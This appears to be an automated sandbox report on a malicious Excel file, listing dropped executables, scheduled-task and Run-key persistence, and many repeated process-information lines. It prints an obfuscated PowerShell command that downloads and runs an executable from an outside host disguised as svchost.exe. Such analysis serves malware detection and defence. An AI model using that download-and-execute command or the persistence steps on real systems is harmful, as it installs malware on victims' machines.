File created: C:\Users\user\AppData\Roaming\svchost.exe

Jump to dropped file

Tries to download and execute files (via powershell)

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;

Source: C:\Users\user\AppData\Local\Temp\ps.exe	File created: C:\Users\user\AppData\Roaming\svchost.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ps.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ps.exe	File created: C:\Users\user\AppData\Roaming\GvthaHtVzpRh.exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
